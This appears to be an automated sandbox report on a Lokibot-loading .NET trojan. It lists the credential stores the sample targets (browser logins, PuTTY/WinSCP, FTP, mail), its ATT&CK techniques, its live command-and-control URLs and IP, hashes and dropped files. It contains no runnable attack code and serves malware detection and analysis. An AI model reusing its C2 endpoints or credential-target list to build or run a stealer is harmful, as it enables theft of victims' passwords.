                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe Code function: 5_2_00406069 GetUserNameW,
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information:

                Yara detected Lokibot
                Source: Yara match File source: 00000000.00000002.300582297.0000000004208000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match File source: 00000005.00000002.512379427.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000002.299347125.0000000003190000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match File source: 00000000.00000002.300559683.00000000041EE000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe PID: 5804, type: MEMORY
                Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe PID: 2576, type: MEMORY
                Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.42092c0.7.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.41eeea0.6.raw.unpack, type: UNPACKEDPE
                Source: Yara match File source: 5.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.400000.0.unpack, type: UNPACKEDPE
                Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Tries to harvest and steal ftp login credentials
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
                Tries to steal Mail credentials (via file access)
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                Tries to steal Mail credentials (via file registry)
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe Code function: PopPassword
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe Code function: SmtpPassword

                Mitre Att&ck Matrix

                Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                Valid Accounts | Windows Management Instrumentation | Path Interception | Access Token Manipulation 1 | Masquerading 1 | OS Credential Dumping 2 | Security Software Discovery 231 | Remote Services | Email Collection 1 | Exfiltration Over Other Network Medium | Encrypted Channel 12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Process Injection 112 | Virtualization/Sandbox Evasion 13 | Credentials in Registry 2 | Virtualization/Sandbox Evasion 13 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Disable or Modify Tools 1 | Security Account Manager | Process Discovery 2 | SMB/Windows Admin Shares | Data from Local System 2 | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Access Token Manipulation 1 | NTDS | Account Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 114 | SIM Card Swap | | Carrier Billing Fraud
                Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection 112 | LSA Secrets | System Owner/User Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
                Replication Through Removable Media | Launchd | Rc.common | Rc.common | Deobfuscate/Decode Files or Information 1 | Cached Domain Credentials | Remote System Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
                External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information 2 | DCSync | File and Directory Discovery 2 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
                Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Timestomp 1 | Proc Filesystem | System Information Discovery 13 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

                Behavior Graph

                Behavior Graph ID: 368924; Sample: SecuriteInfo.com.Trojan.Dow...; Startdate: 15/03/2021; Architecture: WINDOWS; Score: 100

                Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 6 other signatures

                • SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe (started)
                  DNS/IP: liverpooldabestteamoftheworld.com 172.67.197.219, 443, 49691, 49692 CLOUDFLARENET US United States; 192.168.2.1 unknown unknown
                  Signatures: Tries to steal Mail credentials (via file registry); Hides threads from debuggers; Injects a PE file into a foreign processes; Contains functionality to hide a thread from the debugger
                  • SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe (started)
                    DNS/IP: 87.251.79.157, 49696, 49697, 49698 RISS-AS RU Russian Federation
                    Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file access); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc)
                  • cmd.exe (started)
                    • conhost.exe (started)
                    • timeout.exe (started)
                  • WerFault.exe (started)

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                Source | Detection | Scanner | Label
                SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe | 43% | Virustotal |
                SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe | 17% | ReversingLabs | ByteCode-MSIL.Backdoor.Androm
                SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe | 100% | Joe Sandbox ML |

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                Source | Detection | Scanner | Label
                0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.42092c0.7.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                0.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.41eeea0.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                5.2.SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1100849

                Domains

                Source | Detection | Scanner | Label
                liverpooldabestteamoftheworld.com | 0% | Virustotal |

                URLs

                Source | Detection | Scanner | Label
                https://www.liverpool.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish-1995900%Avira URL Cloudsafe
                https://www.liverpool.com/all-about/transfers0%Avira URL Cloudsafe
                https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg0%Avira URL Cloudsafe
                https://www.liverpool.com/liverpool-fc-news/transfer-news/fsg-liverpool-gini-wijnaldum-transfer-18760%Avira URL Cloudsafe
                http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
                http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
                http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
                http://liverpooldabestteamoftheworld.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-0%Avira URL Cloudsafe
                https://liverpooldabestteamoftheworld.com40%Avira URL Cloudsafe
                http://alphastand.top/alien/fre.php0%URL Reputationsafe
                http://alphastand.top/alien/fre.php0%URL Reputationsafe
                http://alphastand.top/alien/fre.php0%URL Reputationsafe
                https://reach-id.orbit.tm-awx.com/analytics.js.gz0%Avira URL Cloudsafe
                https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg0%Avira URL Cloudsafe
                https://www.liverpool.com/liverpool-fc-news/features/jurgen-klopp-liverpool-transfer-targets-19961660%Avira URL Cloudsafe
                https://www.liverpool.com/liverpool-fc-news/features/0%Avira URL Cloudsafe
                https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s270b/0_GettyImages-12737166900%Avira URL Cloudsafe
                http://alphastand.win/alien/fre.php0%URL Reputationsafe
                http://alphastand.win/alien/fre.php0%URL Reputationsafe
                http://alphastand.win/alien/fre.php0%URL Reputationsafe
                http://alphastand.trade/alien/fre.php0%URL Reputationsafe
                http://alphastand.trade/alien/fre.php0%URL Reputationsafe
                http://alphastand.trade/alien/fre.php0%URL Reputationsafe
                https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s270b/0_GettyImages-12313538370%Avira URL Cloudsafe
                https://www.liverpool.com/liverpool-fc-news/features/liverpool-curtis-jones-jurgen-klopp-199410530%Avira URL Cloudsafe
                https://felix.data.tm-awx.com/felix.min.js0%Avira URL Cloudsafe
                https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-0%Avira URL Cloudsafe
                https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s270b/0_RobertsonCross1.jpg0%Avira URL Cloudsafe
                https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s458/0_GettyImages-1273716690.0%Avira URL Cloudsafe
                https://www.liverpool.com/all-about/ozan-kabak0%Avira URL Cloudsafe
                https://i2-prod.liverpool.com/incoming/article19963923.ece/ALTERNATES/s615/1_WhatsApp-Image-2021-03-0%Avira URL Cloudsafe
                https://www.liverpool.com/all-about/sadio-mane0%Avira URL Cloudsafe
                https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-02-0%Avira URL Cloudsafe
                https://www.liverpool.com/all-about/curtis-jones0%Avira URL Cloudsafe
                https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s180/0_GettyImages-1273716690.0%Avira URL Cloudsafe
                http://87.251.79.157/m0ha/0/pin.php0%Avira URL Cloudsafe
                https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s458/0_WhatsApp-Image-2021-03-0%Avira URL Cloudsafe
                https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s220b/0_Salah-Pressing.jpg0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| liverpooldabestteamoftheworld.com | 172.67.197.219 | true | false | | unknown |

                Contacted URLs

| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| http://liverpooldabestteamoftheworld.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-0E44846E8DBE171CF83840F8DBF160DC.html | false | Avira URL Cloud: safe | unknown |
| http://kbfvzoboss.bid/alien/fre.php | true | URL Reputation: safe | unknown |
| http://alphastand.top/alien/fre.php | true | URL Reputation: safe | unknown |
| http://alphastand.win/alien/fre.php | true | URL Reputation: safe | unknown |
| http://alphastand.trade/alien/fre.php | true | URL Reputation: safe | unknown |
| http://87.251.79.157/m0ha/0/pin.php | true | Avira URL Cloud: safe | unknown |

                URLs from Memory and Binaries


                                              Contacted IPs


                                              Public

| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 87.251.79.157 | unknown | Russian Federation | 20803 | RISS-ASRU | true |
| 172.67.197.219 | liverpooldabestteamoftheworld.com | United States | 13335 | CLOUDFLARENETUS | false |

                                              Private

                                              IP
                                              192.168.2.1

                                              General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 368924
Start date: 15.03.2021
Start time: 19:59:49
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 8m 31s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.22120 (renamed file extension from 22120 to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed: 17
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@9/7@2/3
EGA Information: Failed
HDC Information:
• Successful, ratio: 14.3% (good quality ratio 12.9%)
• Quality average: 71.5%
• Quality standard deviation: 33.4%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
Warnings:
                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                              • HTTP Packets have been reduced
                                              • TCP Packets have been reduced to 100
                                              • Excluded IPs from analysis (whitelisted): 13.88.21.125, 104.42.151.234, 13.64.90.137, 40.88.32.150, 23.57.80.111
                                              • Excluded domains from analysis (whitelisted): skypedataprdcoleus15.cloudapp.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, blobcollector.events.data.trafficmanager.net, e1723.g.akamaiedge.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Report size getting too big, too many NtSetInformationFile calls found.

                                              Simulations

                                              Behavior and APIs

                                              Time      Type             Description
                                              20:01:01  API Interceptor  127x Sleep call for process: SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe modified
                                              20:01:11  API Interceptor  1x Sleep call for process: WerFault.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              Match           Associated Sample Name / URL   Detection  Context
                                              172.67.197.219  ORDER-21031566AF.exe           malicious  liverpooldabestteamoftheworld.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-D11DF1C300FC464DC26536C8476FF3AC.html
                                                              Inv_495045_0956.exe            malicious  liverpooldabestteamoftheworld.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-1617C0AF37A58C53412C31983B0B8569.html
                                                              proposal and quotation.doc     malicious  liverpooldabestteamoftheworld.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-DD4D37EC2398DF4D4F5ED60C617DC794.html
                                                              Payment Details_ 11-03-21.jar  malicious  liverpooldabestteamoftheworld.com/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-FCB5112E956162EC0C7B3853038F097A.html

                                              Domains

                                              Match                              Associated Sample Name / URL                      Detection  Context
                                              liverpooldabestteamoftheworld.com  Bank swift copy(1)pdf.exe                         malicious  104.21.52.98
                                                                                 ORDER-21031566AF.exe                              malicious  104.21.52.98
                                                                                 PO_21031566AF_pdf.jar                             malicious  104.21.52.98
                                                                                 Inv_495045_0956.exe                               malicious  104.21.52.98
                                                                                 SecuriteInfo.com.Trojan.Siggen12.39743.30812.exe  malicious  104.21.52.98
                                                                                 proposal and quotation.doc                        malicious  172.67.197.219
                                                                                 payment.exe                                       malicious  104.21.52.98
                                                                                 Payment Details_ 11-03-21.jar                     malicious  172.67.197.219

                                              ASN


                                              JA3 Fingerprints


                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_ED5QJTUK1HDK4BEQ_6ec071164c53d865d187d5df52bc346c96ac7210_85fd9878_177cef95\Report.wer
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):17172
                                              Entropy (8bit):3.764206112710957
                                              Encrypted:false
                                              SSDEEP:192:BgkBdNomHBUZMXyaKeD6UyDW/u7sdS274It07:VB3pBUZMXyasL6/u7sdX4It07
                                              MD5:09A60554DB34CC345E91CADDE92CAF87
                                              SHA1:1BB84BE654AE344B623A7D518AD2ADC752D0E338
                                              SHA-256:15649F2FF122EEA66E88299B070FB15A6E39773E6E679583E9DB48616DAE9795
                                              SHA-512:FA4A285BE21D99C114D426FF5C64376E5399105F2BD2BCEE9EAA207FAA4E83239EE3369A628795FAADB12672E2F67B496212956EED51F7D2A8A56EF382DBD886
                                              Malicious:false
                                              Reputation:low
                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERC8B4.tmp.dmp
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:Mini DuMP crash report, 15 streams, Tue Mar 16 03:01:05 2021, 0x1205a4 type
                                              Category:dropped
                                              Size (bytes):318235
                                              Entropy (8bit):3.668321330308574
                                              Encrypted:false
                                              SSDEEP:3072:Fo9Zp0bnjd+ph+lT5k8dCwRdiTbInU9gIOgF5Br40so0UCgUqrlzBrknM8Tc:FC00ph+R5fdiTbIU9RpDOPo0TjoLknMd
                                              MD5:28C863F4FCD112F82BAB66B2B9DFA1B1
                                              SHA1:898E9C3C833B28BAA7874B537B03EF1D09C025F7
                                              SHA-256:41BB3205FE14DE0041465869DCF101967A9E6DE84E41685459C1921EB787D21E
                                              SHA-512:F287D66A53468D8A4E67217884B9DAD8599601E073B90EC7DE6A7D5F3BB19B7670D74F4D3ADB129E2D8C04753D387068256B1FBB7A1F16B8EE5F3E1EEDCBECF6
                                              Malicious:false
                                              Reputation:low
                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERDCAA.tmp.WERInternalMetadata.xml
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):8444
                                              Entropy (8bit):3.7041334331595737
                                              Encrypted:false
                                              SSDEEP:192:Rrl7r3GLNi9v6BF7dg6YIISUY4FlgmfZ/dSqCprg89b7MsfCJm:RrlsNi16BFm6YXSUY4XgmfbSP7ff1
                                              MD5:CD7EBD6A3193C61FE34CC69E4FDF9E5C
                                              SHA1:3C27B8C3A5A951C43A5A2916651DD502945100CA
                                              SHA-256:852E28B62E1597FA6A0360B4E5370AF730F056766BB72F07A57C33DE92A76587
                                              SHA-512:CCFA8F93E0A4D4BF270D49AF980D513D57B39357425A932010DF05A6FD96624268FAF8CC2DC5A7A8DBBF6E100871505F71862CD5AA08A0B38D6C99AF62BB4DC4
                                              Malicious:false
                                              Reputation:low
                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERDF99.tmp.xml
                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):4841
                                              Entropy (8bit):4.569739677169856
                                              Encrypted:false
                                              SSDEEP:48:cvIwSD8zsUJgtWI9rjWSC8B4R8fm8M4JYyFFF+q8vfy8ClsIsd:uITfS4SSNtJYAKfFClsIsd
                                              MD5:3BA2F85495BF7B459F65BF41415C6E0C
                                              SHA1:01E2E1745A6FEAE2A793E3AF6CF87DA88FF216E3
                                              SHA-256:6BC11954E3E5191BF65BF927496AA7B961EFA238B6414794773E6B7174855FA0
                                              SHA-512:D8ADE265BB8A65BEE9101038CDA126FE84E96CE1E713564388F3F3FC7F831C847196EEB4854FC04EE34E0283FABD2B5EEC808ADFE7FD7DC74A7587BC37B305A3
                                              Malicious:false
                                              Reputation:low
                                              Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="903611" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                              C:\Users\user\AppData\Local\?????????_Inc\SecuriteInfo.com.Trojan.D_Url_l3waih5gwfnhtnkotbdiqibdkxw1gm4o\7.76.506.352\jmbtz0t1.newcfg
                                              Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):575474
                                              Entropy (8bit):3.1026951900295114
                                              Encrypted:false
                                              SSDEEP:6144:36YvEqXbr/2Ej41oWUpdi45fOULXwfr388N7xWGr9jodCWs4//HTH5Rdt2jJ54Lp:36iE4quXwfrMKlow4nHn+J5rQYt2
                                              MD5:0880B7F75557720A1A600FE4BDA9883D
                                              SHA1:A1E49A92589D9862E1B9B0692CBB4C980640ABEB
                                              SHA-256:D0F2C5164B79212C661C1248F82FB66FFD53FE55D24033E77DC1329E8BCD79D4
                                              SHA-512:EDB8EB7C4FE20DEFF1B9AC0148B4AB9EF946235D4CBB80924A27BE6910C761BE0428DD8138529ECDC1DFFD59167975C9F5168B1BF632AC5034A5EAC6F442F8DA
                                              Malicious:false
                                              Reputation:low
                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <sectionGroup name="userSettings" type="System.Configuration.UserSettingsGroup, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" >.. <section name="............................_xAB0C__xAB3A__xAB1B__xAB36__xAB3D__xAB12__xAB30__xAB1B__xAB14__xAB2A__xAB2C__xAB11__xAB12__xAB3C__xAB0D__xAB25__xAB13_" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" allowExeDefinition="MachineToLocalUser" requirePermission="false" />.. </sectionGroup>.. </configSections>.. <userSettings>.. <............................_xAB0C__xAB3A__xAB1B__xAB36__xAB3D__xAB12__xAB30__xAB1B__xAB14__xAB2A__xAB2C__xAB11__xAB12__xAB3C__xAB0D__xAB25__xAB13_>.. <setting name="........
                                              C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
                                              Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              File Type:very short file (no magic)
                                              Category:dropped
                                              Size (bytes):1
                                              Entropy (8bit):0.0
                                              Encrypted:false
                                              SSDEEP:3:U:U
                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview: 1
                                              C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\89dad5d484a9f889a3a8dfca823edc3e_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                                              Process:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):24111
                                              Entropy (8bit):0.6763061048363382
                                              Encrypted:false
                                              SSDEEP:12:fMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeMeN:d
                                              MD5:4A7951952E3A71A87A3AD069CF74E9CE
                                              SHA1:B1D39EB31A4B41A0B8AB35EE295FC985C9C16269
                                              SHA-256:AF981B7F2133C39C2A63CCCFFA531E475D900BB0D78F97F93E371D8E765D9065
                                              SHA-512:657792AC9BAAB3914E630C4FC266C0DA96F3AB326985B41B9C1761ECA70506BD69CEC83EAF58F86B272911FB358364267BC66FCBEDF95F66151BD2BC090AED18
                                              Malicious:false
                                              Reputation:low

                                              Static File Info

                                              General

                                              File type:
                                              Entropy (8bit):4.745833393708009
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                              • Windows Screen Saver (13104/52) 0.07%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              File name:SecuriteInfo.com.Trojan.DownloaderNET.131.2724.exe
                                              File size:433664
                                              MD5:968e090b17ce57156a66188b4db032ba
                                              SHA1:de2b8b3bf2024cf8a3bdd7ede0ce86bb5a7b13de
                                              SHA256:62562b38c8055ca3d5143c759d1fe6e946e0b3a85bf4397b056589d3c271392c
                                              SHA512:026b053a6405302926b6e24dbfa7941a255b71258546d4b93fac0681806a935fd5a8459e6f6fa14317f0eabef8c3dfafb1bebd346f3b6412eb9142c39cf7f2a9
                                              SSDEEP:6144:qCi27P8//mMgWFwOLyw1esyC6gcG6Li6dYs5n0evECRfwEWN9kp0gi:Ji27P8//mZWFwAyw1e

                                              File Icon

                                              Icon Hash:00828e8e8686b000

                                              Static PE Info

                                              General

                                              Entrypoint:0x46b00e
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                              Time Stamp:0xCBF103ED [Sat Jun 4 12:07:09 2078 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:v4.0.30319
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                              Entrypoint Preview

                                              Instruction
                                              jmp dword ptr [00402000h]
                                              add byte ptr [eax], al

                                              Data Directories

                                              Name | Virtual Address | Virtual Size | Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6afb4 | 0x57 | .text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6c000 | 0x60c | .rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6e000 | 0xc | .reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
